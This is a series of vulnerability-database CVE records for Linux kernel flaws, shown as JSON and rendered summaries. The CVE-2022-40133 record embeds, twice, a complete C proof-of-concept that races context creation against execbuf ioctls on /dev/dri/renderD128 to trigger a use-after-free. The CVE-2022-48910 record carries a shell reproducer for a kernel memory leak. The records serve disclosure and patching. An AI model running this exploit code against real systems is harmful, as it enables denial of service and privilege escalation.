"url": "https://git.kernel.org/stable/c/375be2dd61a072f7b1cac9b17eea59e07b58db3a"
},
{
"url": "https://git.kernel.org/stable/c/2d2820d5f375563690c96e60676855205abfb7f5"
},
{
"url": "https://git.kernel.org/stable/c/9891e5c73cab3fd9ed532dc50e9799e55e974766"
},
{
"url": "https://git.kernel.org/stable/c/66fc1600855c05c4ba4e997184c91cf298e0405c"
},
{
"url": "https://git.kernel.org/stable/c/f39c813af0b64f44af94e435c07bfa1ddc2575f5"
},
{
"url": "https://git.kernel.org/stable/c/08864dc14a6803f0377ca77b9740b26db30c020f"
},
{
"url": "https://git.kernel.org/stable/c/e8fb5bc76eb86437ab87002d4a36d6da02165654"
}
],
"title": "usb: xhci: Check endpoint is valid before dereferencing it",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52901",
"datePublished": "2024-08-21T06:10:41.640Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-04T07:45:40.190Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-40133 (GCVE-0-2022-40133)
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 03:49
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free(UAF) vulnerability was found in function 'vmw_execbuf_tie_context' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T12:14:39.687Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-09-09T14:39:51",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
],
"discovery": "INTERNAL"
},
"title": "There is an UAF vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"AKA": "Anolis",
"ASSIGNER": "security@openanolis.org",
"DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
"ID": "CVE-2022-40133",
"STATE": "PUBLIC",
"TITLE": "There is an UAF vulnerability in vmwgfx driver"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "kernel",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_name": "5.13.0-52",
"version_value": "v4.20-rc1"
}
]
}
}
]
},
"vendor_name": "Linux"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
]
},
"exploit": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}"
}
],
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-416 Use After Free"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075",
"refsource": "MISC",
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
}
]
},
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
],
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-40133",
"datePublished": "2022-09-09T14:39:51.501308Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-17T03:49:24.624Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48910 (GCVE-0-2022-48910)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: ensure we call ipv6_mc_down() at most once
There are two reasons for addrconf_notify() to be called with NETDEV_DOWN:
either the network device is actually going down, or IPv6 was disabled
on the interface.
If either of them stays down while the other is toggled, we repeatedly
call the code for NETDEV_DOWN, including ipv6_mc_down(), while never
calling the corresponding ipv6_mc_up() in between. This will cause a
new entry in idev->mc_tomb to be allocated for each multicast group
the interface is subscribed to, which in turn leaks one struct ifmcaddr6
per nontrivial multicast group the interface is subscribed to.
The following reproducer will leak at least $n objects:
ip addr add ff2e::4242/32 dev eth0 autojoin
sysctl -w net.ipv6.conf.eth0.disable_ipv6=1
for i in $(seq 1 $n); do
ip link set up eth0; ip link set down eth0
done
Joining groups with IPV6_ADD_MEMBERSHIP (unprivileged) or setting the
sysctl net.ipv6.conf.eth0.forwarding to 1 (=> subscribing to ff02::2)
can also be used to create a nontrivial idev->mc_list, which will the
leak objects with the right up-down-sequence.
Based on both sources for NETDEV_DOWN events the interface IPv6 state
should be considered:
- not ready if the network interface is not ready OR IPv6 is disabled
for it
- ready if the network interface is ready AND IPv6 is enabled for it
The functions ipv6_mc_up() and ipv6_down() should only be run when this
state changes.
Implement this by remembering when the IPv6 state is ready, and only
run ipv6_mc_down() if it actually changed from ready to not ready.
The other direction (not ready -> ready) already works correctly, as:
- the interface notification triggered codepath for NETDEV_UP /
NETDEV_CHANGE returns early if ipv6 is disabled, and
- the disable_ipv6=0 triggered codepath skips fully initializing the
interface as long as addrconf_link_ready(dev) returns false
- calling ipv6_mc_up() repeatedly does not leak anything
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 Version: 3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48910",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:04.134343Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:02.150Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9a8736b2da28b24f01707f592ff059b9f90a058c",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "c71bf3229f9e9dd60ba02f5a5be02066edf57012",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "24888915364cfa410de62d8abb5df95c3b67455d",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "9588ac2eddc2f223ebcebf6e9f5caed84d32922b",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "f4c63b24dea9cc2043ff845dcca9aaf8109ea38a",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "b11781515208dd31fbcd0b664078dce5dc44523f",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "72124e65a70b84e6303a5cd21b0ac1f27d7d61a4",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
},
{
"lessThan": "9995b408f17ff8c7f11bc725c8aa225ba3a63b1c",
"status": "affected",
"version": "3ce62a84d53cd3d3cc5377bbf339e9b08ddf9c36",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/addrconf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.323",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.193",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.313",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.278",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.323",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.193",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: ensure we call ipv6_mc_down() at most once\n\nThere are two reasons for addrconf_notify() to be called with NETDEV_DOWN:\neither the network device is actually going down, or IPv6 was disabled\non the interface.\n\nIf either of them stays down while the other is toggled, we repeatedly\ncall the code for NETDEV_DOWN, including ipv6_mc_down(), while never\ncalling the corresponding ipv6_mc_up() in between. This will cause a\nnew entry in idev-\u003emc_tomb to be allocated for each multicast group\nthe interface is subscribed to, which in turn leaks one struct ifmcaddr6\nper nontrivial multicast group the interface is subscribed to.\n\nThe following reproducer will leak at least $n objects:\n\nip addr add ff2e::4242/32 dev eth0 autojoin\nsysctl -w net.ipv6.conf.eth0.disable_ipv6=1\nfor i in $(seq 1 $n); do\n\tip link set up eth0; ip link set down eth0\ndone\n\nJoining groups with IPV6_ADD_MEMBERSHIP (unprivileged) or setting the\nsysctl net.ipv6.conf.eth0.forwarding to 1 (=\u003e subscribing to ff02::2)\ncan also be used to create a nontrivial idev-\u003emc_list, which will the\nleak objects with the right up-down-sequence.\n\nBased on both sources for NETDEV_DOWN events the interface IPv6 state\nshould be considered:\n\n - not ready if the network interface is not ready OR IPv6 is disabled\n for it\n - ready if the network interface is ready AND IPv6 is enabled for it\n\nThe functions ipv6_mc_up() and ipv6_down() should only be run when this\nstate changes.\n\nImplement this by remembering when the IPv6 state is ready, and only\nrun ipv6_mc_down() if it actually changed from ready to not ready.\n\nThe other direction (not ready -\u003e ready) already works correctly, as:\n\n - the interface notification triggered codepath for NETDEV_UP /\n NETDEV_CHANGE returns early if ipv6 is disabled, and\n - the disable_ipv6=0 triggered codepath skips fully initializing the\n interface as long as addrconf_link_ready(dev) returns false\n - calling ipv6_mc_up() repeatedly does not leak anything"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:55.705Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9a8736b2da28b24f01707f592ff059b9f90a058c"
},
{
"url": "https://git.kernel.org/stable/c/c71bf3229f9e9dd60ba02f5a5be02066edf57012"
},
{
"url": "https://git.kernel.org/stable/c/24888915364cfa410de62d8abb5df95c3b67455d"
},
{
"url": "https://git.kernel.org/stable/c/9588ac2eddc2f223ebcebf6e9f5caed84d32922b"
},
{
"url": "https://git.kernel.org/stable/c/f4c63b24dea9cc2043ff845dcca9aaf8109ea38a"
},
{
"url": "https://git.kernel.org/stable/c/b11781515208dd31fbcd0b664078dce5dc44523f"
},
{
"url": "https://git.kernel.org/stable/c/72124e65a70b84e6303a5cd21b0ac1f27d7d61a4"
},
{
"url": "https://git.kernel.org/stable/c/9995b408f17ff8c7f11bc725c8aa225ba3a63b1c"
}
],
"title": "net: ipv6: ensure we call ipv6_mc_down() at most once",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48910",
"datePublished": "2024-08-22T01:30:54.351Z",
"dateReserved": "2024-08-21T06:06:23.293Z",
"dateUpdated": "2025-05-04T08:25:55.705Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42090 (GCVE-0-2024-42090)
Vulnerability from cvelistv5
Published
2024-07-29 16:26
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER
In create_pinctrl(), pinctrl_maps_mutex is acquired before calling
add_setting(). If add_setting() returns -EPROBE_DEFER, create_pinctrl()
calls pinctrl_free(). However, pinctrl_free() attempts to acquire
pinctrl_maps_mutex, which is already held by create_pinctrl(), leading to
a potential deadlock.
This patch resolves the issue by releasing pinctrl_maps_mutex before
calling pinctrl_free(), preventing the deadlock.
This bug was discovered and resolved using Coverity Static Analysis
Security Testing (SAST) by Synopsys, Inc.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 Version: 42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.186Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e65a0dc2e85efb28e182aca50218e8a056d0ce04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/420ce1261907e5dbeda1e4daffd5b6c76f8188c0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b813e3fd102a959c5b208ed68afe27e0137a561b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01fe2f885f7813f8aed5d3704b384a97b1116a9e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b36efd2e3e22a329444b6b24fa48df6d20ae66e6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4038c57bf61631219b31f1bd6e92106ec7f084dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/48a7a7c9571c3e62f17012dd7f2063e926179ddd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/adec57ff8e66aee632f3dd1f93787c13d112b7a1"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42090",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:41.131591Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:01.081Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e65a0dc2e85efb28e182aca50218e8a056d0ce04",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "420ce1261907e5dbeda1e4daffd5b6c76f8188c0",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "b813e3fd102a959c5b208ed68afe27e0137a561b",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
"lessThan": "01fe2f885f7813f8aed5d3704b384a97b1116a9e",
"status": "affected",
"version": "42fed7ba44e4e8c1fb27b28ad14490cb1daff3c7",
"versionType": "git"
},
{
